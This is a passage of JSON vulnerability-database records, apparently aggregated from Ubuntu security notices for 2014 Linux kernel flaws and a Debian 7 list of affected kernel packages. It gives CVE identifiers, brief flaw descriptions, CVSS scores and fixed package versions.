"linux-image-3.13.0-32-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-powerpc-e500", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-32.57", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-generic-lpae", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nSalva Peir\u00f3 discovered an information leak in the Linux kernel\u2019s media- device driver. A local attacker could exploit this flaw to obtain sensitive information from kernel memory. (CVE-2014-1739)\n\nA bounds check error was discovered in the socket filter subsystem of the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) via crafted BPF instructions. (CVE-2014-3144)\n\nA remainder calculation error was discovered in the socket filter subsystem of the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) via crafted BPF instructions. (CVE-2014-3145)\n\nA flaw was discovered in the Linux kernel\u2019s handling of hugetlb entries. A local user could exploit this flaw to cause a denial service (memory corruption or system crash). (CVE-2014-3940)\n\nDon Bailey and Ludvig Strigeus discovered an integer overflow in the Linux kernel\u2019s implementation of the LZ4 decompression algorithm, when used by code not complying with API limitations. An attacker could exploit this flaw to cause a denial of service (memory corruption) or possibly other unspecified impact. (CVE-2014-4611)\n\nTuomas R\u00e4s\u00e4nen reported the Linux kernel on certain Intel processors does not properly initialize random seeds for network operations, causing TCP sequence numbers, TCP and UDP port numbers and IP ID values to be predictable. A remote attacker could exploit this flaw to spoof or disrupt IP communication. (CVE-2014-7284)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-17T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3940", "CVE-2014-7284", "CVE-2014-1739", "CVE-2014-4943", "CVE-2014-3145", "CVE-2014-3144", "CVE-2014-4611"], "modified": "2014-07-17T00:00:00", "href": "https://usn.ubuntu.com/2290-1/", "id": "USN-2290-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:17:20", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0131", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4014", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4608", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3917", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3144", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3145", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-1739"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.8.0-44.66~precise1", "arch": "noarch", "packageName": "linux-image-3.8.0-44-generic", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel\u2019s segmentation of skbs when using the zerocopy feature of vhost-net. A local attacker could exploit this flaw to gain potentially sensitive information from kernel memory. (CVE-2014-0131)\n\nSalva Peir\u00c3\u00b3 discovered an information leak in the Linux kernel\u2019s media- device driver. A local attacker could exploit this flaw to obtain sensitive information from kernel memory. (CVE-2014-1739)\n\nA bounds check error was discovered in the socket filter subsystem of the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) via crafted BPF instructions. (CVE-2014-3144)\n\nA remainder calculation error was discovered in the socket filter subsystem of the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) via crafted BPF instructions. (CVE-2014-3145)\n\nAn flaw was discovered in the Linux kernel\u2019s audit subsystem when auditing certain syscalls. A local attacker could exploit this flaw to obtain potentially sensitive single-bit values from kernel memory or cause a denial of service (OOPS). (CVE-2014-3917)\n\nA flaw was discovered in the Linux kernel\u2019s implementation of user namespaces with respect to inode permissions. A local user could exploit this flaw by creating a user namespace to gain administrative privileges. (CVE-2014-4014)\n\nDon Bailey discovered a flaw in the LZO decompress algorithm used by the Linux kernel. An attacker could exploit this flaw to cause a denial of service (memory corruption or OOPS). (CVE-2014-4608)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-17T00:00:00", "title": "Linux kernel (Raring HWE) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0131", "CVE-2014-1739", "CVE-2014-4943", "CVE-2014-3145", "CVE-2014-4014", "CVE-2014-3917", "CVE-2014-3144", "CVE-2014-4608"], "modified": "2014-07-17T00:00:00", "href": "https://usn.ubuntu.com/2286-1/", "id": "USN-2286-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T18:19:36", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4611", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3940", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-4943", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3144", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-7284", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-3145", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-1739"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0-32.57~precise1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0-32.57~precise1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-32-generic", "operator": "lt"}], "description": "Sasha Levin reported a flaw in the Linux kernel\u2019s point-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol (L2TP). A local user could exploit this flaw to gain administrative privileges. (CVE-2014-4943)\n\nSalva Peir\u00f3 discovered an information leak in the Linux kernel\u2019s media- device driver. A local attacker could exploit this flaw to obtain sensitive information from kernel memory. (CVE-2014-1739)\n\nA bounds check error was discovered in the socket filter subsystem of the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) via crafted BPF instructions. (CVE-2014-3144)\n\nA remainder calculation error was discovered in the socket filter subsystem of the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) via crafted BPF instructions. (CVE-2014-3145)\n\nA flaw was discovered in the Linux kernel\u2019s handling of hugetlb entries. A local user could exploit this flaw to cause a denial service (memory corruption or system crash). (CVE-2014-3940)\n\nDon Bailey and Ludvig Strigeus discovered an integer overflow in the Linux kernel\u2019s implementation of the LZ4 decompression algorithm, when used by code not complying with API limitations. An attacker could exploit this flaw to cause a denial of service (memory corruption) or possibly other unspecified impact. (CVE-2014-4611)\n\nTuomas R\u00e4s\u00e4nen reported the Linux kernel on certain Intel processors does not properly initialize random seeds for network operations, causing TCP sequence numbers, TCP and UDP port numbers and IP ID values to be predictable. A remote attacker could exploit this flaw to spoof or disrupt IP communication. (CVE-2014-7284)", "edition": 1, "reporter": "Ubuntu", "published": "2014-07-17T00:00:00", "type": "ubuntu", "title": "Linux kernel (Trusty HWE) vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3940", "CVE-2014-7284", "CVE-2014-1739", "CVE-2014-4943", "CVE-2014-3145", "CVE-2014-3144", "CVE-2014-4611"], "modified": "2014-07-17T00:00:00", "href": "https://usn.ubuntu.com/2288-1/", "id": "USN-2288-1", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-05-07T00:55:14", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-all-armhf_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-all-armhf", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-amd64-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-amd64-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-rt-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-rt-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-all_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-rt-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-rt-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-omap_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-omap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-mv78xx0_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-mv78xx0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-all-armhf_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-all-armhf", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-686-pae-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-686-pae-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-support-3.2.0-5_3.2.60-1+deb7u3_all.deb", "packageName": "linux-support-3.2.0-5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-iop32x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-iop32x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-mv78xx0_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-mv78xx0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-mx5_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-mx5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-doc-3.2_3.2.60-1+deb7u3_all.deb", "packageName": "linux-doc-3.2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-support-3.2.0-6_3.2.60-1+deb7u3_all.deb", "packageName": "linux-support-3.2.0-6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-vexpress_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-vexpress", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-omap_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-omap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-ixp4xx_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-ixp4xx", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-iop32x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-iop32x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-rt-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-rt-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-rt-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-rt-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-all-armhf_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-all-armhf", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-vexpress_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-vexpress", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "xen-linux-system-3.2.0-4-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "xen-linux-system-3.2.0-4-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-mx5_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-mx5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-source-3.2_3.2.60-1+deb7u3_all.deb", "packageName": "linux-source-3.2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-486_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-486", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-common_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-common", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "xen-linux-system-3.2.0-6-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "xen-linux-system-3.2.0-6-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-versatile_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-versatile", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-versatile_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-versatile", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "xen-linux-system-3.2.0-6-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "xen-linux-system-3.2.0-6-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-kirkwood_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-kirkwood", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-all-i386_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-all-i386", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-omap_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-omap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-kirkwood_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-kirkwood", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-ixp4xx_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-ixp4xx", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-all-armel_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-all-armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-common-rt_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-common-rt", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-mv78xx0_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-mv78xx0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-omap_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-omap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-rt-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-rt-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-iop32x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-iop32x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-486_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-486", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-rt-686-pae_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-rt-686-pae", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-rt-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-rt-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-686-pae-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-686-pae-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-all-armel_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-all-armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-kirkwood_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-kirkwood", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-mx5_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-mx5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-rt-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-rt-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-manual-3.2_3.2.60-1+deb7u3_all.deb", "packageName": "linux-manual-3.2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-orion5x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-orion5x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-iop32x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-iop32x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-all_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-vexpress_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-vexpress", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-486_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-486", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-rt-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-rt-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-versatile_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-versatile", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-vexpress_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-vexpress", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-kirkwood_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-kirkwood", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-common-rt_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-common-rt", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-orion5x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-orion5x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-486_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-486", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-5-rt-686-pae-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-5-rt-686-pae-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-5-iop32x_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-5-iop32x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-ixp4xx_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-ixp4xx", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-4-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-4-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-headers-3.2.0-6-omap_3.2.60-1+deb7u3_all.deb", "packageName": "linux-headers-3.2.0-6-omap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "xen-linux-system-3.2.0-5-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "xen-linux-system-3.2.0-5-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-6-rt-amd64-dbg_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-6-rt-amd64-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-support-3.2.0-4_3.2.60-1+deb7u3_all.deb", "packageName": "linux-support-3.2.0-4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": "linux-image-3.2.0-4-rt-amd64_3.2.60-1+deb7u3_all.deb", "packageName": "linux-image-3.2.0-4-rt-amd64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.2.60-1+deb7u3", "arch": "all", "packageFilename": 